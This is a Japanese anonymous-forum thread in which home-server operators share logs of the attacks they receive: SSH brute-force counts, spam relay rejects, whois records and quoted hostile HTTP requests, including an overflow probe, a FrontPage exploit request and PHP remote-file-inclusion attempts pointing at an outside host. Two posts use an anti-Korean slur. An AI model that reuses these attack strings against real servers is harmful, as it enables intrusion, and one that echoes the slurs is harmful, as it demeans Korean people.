自宅鯖に攻撃された回数

[0001 DNS未登録さん 03/04/29 16:24 ID:ZxRqeijn]

漏れはアタックされたことないが
ウィルスを入れられたことはある
ドレぐらいあるか、話し合いましょう〜

[0044 DNS未登録さん 04/03/03 12:13 ID:???]

び

[0045 DNS未登録さん 04/03/03 22:12 ID:???]

ー

[0046 DNS未登録さん 04/03/03 22:13 ID:???]

む

[0047 DNS未登録さん 04/03/05 01:41 ID:???]

し

[0048 DNS未登録さん 04/03/06 10:18 ID:???]

数える気にもならん…

[0049 DNS未登録さん 04/03/20 13:08 ID:???]

り

[0050 仕様書無しさん 04/10/04 23:56:03 ID:odsrLN5V]

今頃、CodeRedとか、Nimdaに感染されてることを想定して、
アタックしてくるヤツがいるんだけど。
そいつら、時代遅れ？

[0051 DNS未登録さん 04/10/24 20:35:32 ID:GhNIlj98]

自宅鯖のログに、こんなのが。
$ grep "Invalid user" $LOG |cat -n |tail -n1
43 Oct DD HH:MM:SS SERVER sshd[NUM]: Invalid user test from 211.192.229.4

そっちを適当につついて見たが、サーバソフトが軒並2年前のバージョンで、
当然脆弱性てんこ漏り...

要するに、此奴、踏台になってる模様。

[0052 DNS未登録さん 04/10/24 21:10:43 ID:???]

>>50
まあ、時代遅れといえばそうなんだろうな。
おまえさんのサイトが脆弱そうだから攻撃してるんじゃなくて、そいつらのサイトが脆弱なだけだと思うけど。

[0053 DNS未登録さん 04/10/25 11:14:19 ID:???]

>>51
バージョンが古いからってセキュリティホールが残っているものだと考えるのは
厨だぞ。パッケージ製品ならともかく、オープンソースならパッチをバックポート
して適用する場合もあるわけだし。

[0054 51 04/10/25 19:34:10 ID:???]

>>53
もう少し説明したい。

まず、縁のゆかりもない俺の自宅鯖に、一分程の間に43回、複数の名前
(test, jane, webmaster, mysql他いろいろ)でsshしてきた経緯がわからない。

こっちは人にアカウントあげた覚えはない。

くだんのIPを自分でつつけば分かるが、サーバソフト(proftpd, apache, php)の
バージョンが揃って2002年前半のそれだった(もちろん、返す値が真実と
かけはなれてる可能性は当然ある)。

# 流石に当該サイトの脆弱性検証まではやってないので(立派なクラックじゃん)

そこのftpdにアクセスすると、あるドメインが表示されたので、ぐぐってみると
すぐ近くのIPを持つ韓国語のサイトに出た。
こっちはさらに酷かった。
ネームサーバがたってたのでdigで試すと、関係ないドメインまで検索してくれた。
(そんなの、プロバイダが顧客向けにやれば十分だと思うが...)

6000まで開いていた。インターネット越しにX動かす神経が信じられない。
(単に気づかないだけなら、さらに救いがたい)

ちなみに使ってるサーバのバージョンは同一だった。

これだけの事実を見ると、管理者の勘違いOR悪戯というより、そのシステムを
乗っ取った小僧の可能性を疑いたくなる。

# 他に勘違いしてる可能性があったら教えてくれ。

[0055 DNS未登録さん 04/10/26 13:11:32 ID:SAiFAV7q]

Oct 22 15:02:11 SERVER postfix/smtpd[1227]: connect from unknown
  [221.140.55.88]
Oct 22 15:02:12 SERVER postfix/smtpd[1227]: NOQUEUE: reject: RCPT
  from unknown[221.140.55.88]: 554 <moneyhunter99@daum.net>: Relay
  access denied; from=<ddhe2oo9uuhh44tyqg2@yahoo.com.au>
  to=<moneyhunter99@daum.net> proto=SMTP helo=<none>
Oct 22 15:02:12 SERVER postfix/smtpd[1227]: disconnect from unknown
  [221.140.55.88]

スパマー大っ嫌い。

[0056 DNS未登録さん 04/11/02 16:45:31 ID:???]

inetnum: 219.0.0.0 - 219.63.255.255
netname: BBTECH
descr: SOFTBANK BB CORP
descr: Nation wide network in Japan
country: JP
admin-c: SA127-AP
tech-c: SA127-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-JP-BBTECH
changed: hostmaster@apnic.net 20011031
changed: hm-changed@apnic.net 20030616
status: ALLOCATED PORTABLE
source: APNIC

[0057 DNS未登録さん 2005/05/19(木) 11:56:11 ID:???]

携帯のIPで朝から140件ほど攻撃を受けてる

[0058 DNS未登録さん 2006/06/15(木) 00:02:07 ID:???]

KRNIC is not a ISP but a National Internet Registry similar to APNIC.
The address is allocated yet

Please contact following ISP for further information

[ ISP Organization Information ]
Org Name : NIDA
Service Name : KRNIC-NET
Org Address : Seocho 2-dong Seocho-gu SEOUL
Org Detail Address: 1321-11 11th KTF B/D

[ ISP IP Admin Contact Information ]
Name : IP Adm
Phone : +82-2-2186-4500
E-Mail : noc@nida.or.kr

[ ISP IP Tech Contact Information ]
Name : IP Tech
Phone : +82-2-2186-4500
E-mail : noc@nida.or.kr

[ ISP Network Abuse Contact Information ]
Name : Abuse Manager
Phone : +82-2-2186-4500
E-mail : noc@nida.or.kr

- NIDA/KRNIC Whois Service -

こいつ（202.30.50.120）がこの2時間で100回ぐらい仕掛けてきてる。
まじでﾁｮﾝ死ね。

[0059 DNS未登録さん 2007/12/06(木) 00:30:04 ID:???]

機能サーバーで足の小指打った。

[0060 DNS未登録さん 2007/12/29(土) 21:17:17 ID:???]

↓こんなのが1回
GET /w00tw00t.at.ISC.SANS.DFind:)

↓こんなのが週数回
SEARCH /\x90\xc9\(略)\x90\
POST /_vti_bin/_vti_aut/fp30reg.dll

[0061 DNS未登録さん 2008/05/13(火) 12:37:23 ID:JVWzeohz]

>>1
ネットに一時間つなげば、一回や二回あってもおかしくない。
普通は数え切れないはず。

[0062 DNS未登録さん 2008/05/14(水) 04:11:44 ID:yJwFMBtH]

自分が管理しているサーバーに攻撃されたのか？
なんか凶暴なサーバーなんだねw

[0063 DNS未登録さん 2008/05/14(水) 09:44:30 ID:???]

面白い事書こうと必死杉
頭ﾜﾙｿｰ

[0064 DNS未登録さん 2008/05/15(木) 09:28:02 ID:???]

うちのおかんから攻撃がありました！

かーちゃん……電源ぬくなよ

[0065 DNS未登録さん 2008/05/16(金) 10:45:49 ID:???]

おかん最強のクラッカー

[0066 DNS未登録さん 2008/05/16(金) 18:49:20 ID:???]

一人暮らしすればいい話だが

[0067 DNS未登録さん 2008/05/30(金) 17:32:46 ID:Ot7IDYtB]

ちょっと穴空けて、踏み台にされるのを待っているんだけど・・・

ツールとかドサッと置いたのを確認してから、いただいちゃおうって考えね。

[0068 DNS未登録さん 2008/05/30(金) 23:38:18 ID:???]

>>67
それ何ていう死亡フラグ？

[0069 DNS未登録さん 2008/07/01(火) 16:45:50 ID:yWt1W5th]

最近、8080ポート空けてると毎日

GET /manager/html

ってのがやたら来るんだけど、何がしたいのやら

[0070 DNS未登録さん 2008/07/01(火) 19:18:56 ID:???]

/脆弱性が見つかってるphp?http://URL
みたいなのが土曜からずっと来てるのだけど。
エージェントはlibwww-perlやMorfeus Fucking Scanner
ディレクトリやPHP名はかわっていってるけど、自分の鯖はPHP導入してないんだよね
検索で探せばPHP使ってるサイト等結構みつかるのに、そんな確認もせずに総スキャンかましてるのか
2-3回アクセス毎にIP変わってるのでiptablesの制限にかからないけど、PHPを使ってない鯖にいつまで続けるんだろ

[0071 70 2008/07/01(火) 20:54:05 ID:???]

読み直してみたら70の日本語が変だorz

[0072 DNS未登録さん 2008/07/02(水) 07:47:37 ID:xJhKfCu8]

認証とか面倒なんでポート全解放 管理者パスワード無し
最近不安定でexploler.exeが起動しないからアップデートもしてない

でもアタックなんてされるわけないから大丈夫

[0073 DNS未登録さん 2008/07/25(金) 14:05:00 ID:Wso8n28Y]

サーバーにハッキングしようとする悪質な輩を晒し上げ

Failed logins from:
58.229.117.54: 3201 times
122.209.225.187: 26 times
125.54.44.56 (KD125054044056.ppp-bb.dion.ne.jp): 1 time

Illegal users from:
58.229.117.54: 2864 times
122.209.225.187: 1 time

Failed logins from:
128.134.180.202: 38 times
202.108.201.158: 22 times
213.194.149.28 (ns4.hostinglmi.net): 30 times
218.12.196.5: 5 times
222.73.225.84: 124 times

Illegal users from:
128.134.180.202: 174 times
202.108.201.158: 31 times
213.194.149.28 (ns4.hostinglmi.net): 1043 times
218.12.196.5: 4 times
222.73.225.84: 144 times

[0074 DNS未登録さん 2008/07/25(金) 14:22:17 ID:???]

>>73
とりあえずチョンは弾けよ

[0075 DNS未登録さん 2008/07/27(日) 20:39:04 ID:???]

サーバーにハッキングしようとする悪質な輩を晒し上げ

Failed logins from:
70.86.87.58 (3a.57.5646.static.theplanet.com): 573 times
88.191.78.192 (sd-13533.dedibox.fr): 312 times

Illegal users from:
88.191.78.192 (sd-13533.dedibox.fr): 5 times

[0076 DNS未登録さん 2008/08/03(日) 14:06:34 ID:vBrtm0/V]

運用が安定してからsshの不正ログインチャレンジは毎日200はあったな

sshdのポートを変えたらゼロになった

[0077 DNS未登録さん 2008/08/10(日) 05:32:39 ID:Th0Uozn8]

サーバーにハッキングしようとする悪質な輩を晒し上げ
毎日こんな調子だわ orz

Failed logins from:
74.52.28.122 (7a.1c.344a.static.theplanet.com): 13 times
80.232.45.118: 523 times
81.86.39.135 (81-86-39-135.dsl.pipex.com): 2 times
83.16.138.122 (afi122.internetdsl.tpnet.pl): 6 times
207.58.135.82 (pi.com): 114 times

Illegal users from:
74.52.28.122 (7a.1c.344a.static.theplanet.com): 2 times
80.232.45.118: 1608 times
81.86.39.135 (81-86-39-135.dsl.pipex.com): 1 time
83.16.138.122 (afi122.internetdsl.tpnet.pl): 788 times
207.58.135.82 (pi.com): 2030 times

[0078 DNS未登録さん 2008/08/14(木) 11:44:05 ID:???]

俺実際にルータの設定いじられたことあるｗ
知らない間にポート全部開いてたｗ
アタック通知設定にすべきだな

[0079 DNS未登録さん 2008/08/17(日) 02:19:47 ID:???]

怖えええええええｗｗ

[0080 DNS未登録さん 2008/08/17(日) 02:56:35 ID:???]

>>78
それはルータとサーバのどっちの設定に問題があったんだ？

[0081 DNS未登録さん 2008/08/24(日) 03:31:04 ID:???]

最近
/send_reminders.php?includedir=http://www.*.de/2007/pics/id.txt???
みたいなのが毎日数時間置きぐらいにきてるけど、他の人はどう?
とりあえずユーザーエージェントとしてとして残ってるlibwww-perlをDROPしたから403を返してるけど、それでもずーとアクセスあるのよね
php使ってないのにさ
IPも次から次へと変えてるっぽい

[0082 DNS未登録さん 2008/08/24(日) 15:48:10 ID:???]

>81
ぐぐるぐらい自分でやれ。
http://www.securityfocus.com/bid/14651

[0083 DNS未登録さん 2008/08/24(日) 16:40:08 ID:???]

>>82
いや、この手のアクセスが毎日数時間おきに来てるって事が言いたかったわけです
他の人はどうかなっと

[0084 DNS未登録さん 2009/02/02(月) 16:17:34 ID:???]

じさばは、大切なファイルのあるPCと同じラン上にあるんですか？

[0085 DNS未登録さん 2009/03/09(月) 03:30:00 ID:???]

いつも使ってるPCで自鯖運営すると結構便利
攻撃されたらすぐLANケーブル抜くことができるし。

[0086 DNS未登録さん 2009/03/10(火) 14:51:10 ID:???]

それは降伏では・・・

[0087 DNS未登録さん 2009/04/10(金) 20:22:56 ID:???]

鯖がよく落ちるなと思って、今日セキュリティログ見てみたら30171番ポートにボットネットから攻撃されてやがった。
どうすればいいものか。

[0088 DNS未登録さん 2009/04/18(土) 08:20:51 ID:???]

つ iptables
つ ipfilter
つ ipfw
つ PeerGuardian

[0089 DNS未登録さん 2009/05/28(木) 10:18:49 ID:???]

つ [めるこ]
つ [これが]

[0090 DNS未登録さん 2009/08/05(水) 03:01:07 ID:???]

つ［pci］
つ［WinME］

[0091 DNS未登録さん 2010/04/08(木) 00:25:48 ID:???]

>>69
　Tomcatの管理用コンテキストにアクセスできてしまうことがある。
　ほとんどの場合、Basic認証付きがデフォルトだから、大丈夫。

[0092 DNS未登録さん 2010/05/23(日) 13:19:53 ID:???]

65.74.168.210 (c1resolver1.ctmail.com)

最近やたら多いんだけど
カードの情報盗まれた可能性もあるので警察に届けた方がいいかしら？

[0093 忍法帖【Lv=40,xxxPT】(4+0：8) 【25.9m】 電脳プリオン ◆3YKmpu7JR7Ic 2012/10/20(土) 23:20:08.85 ID:???]

0回

[0094 DNS未登録さん 2019/05/27(月) 17:26:50.64 ID:???]

．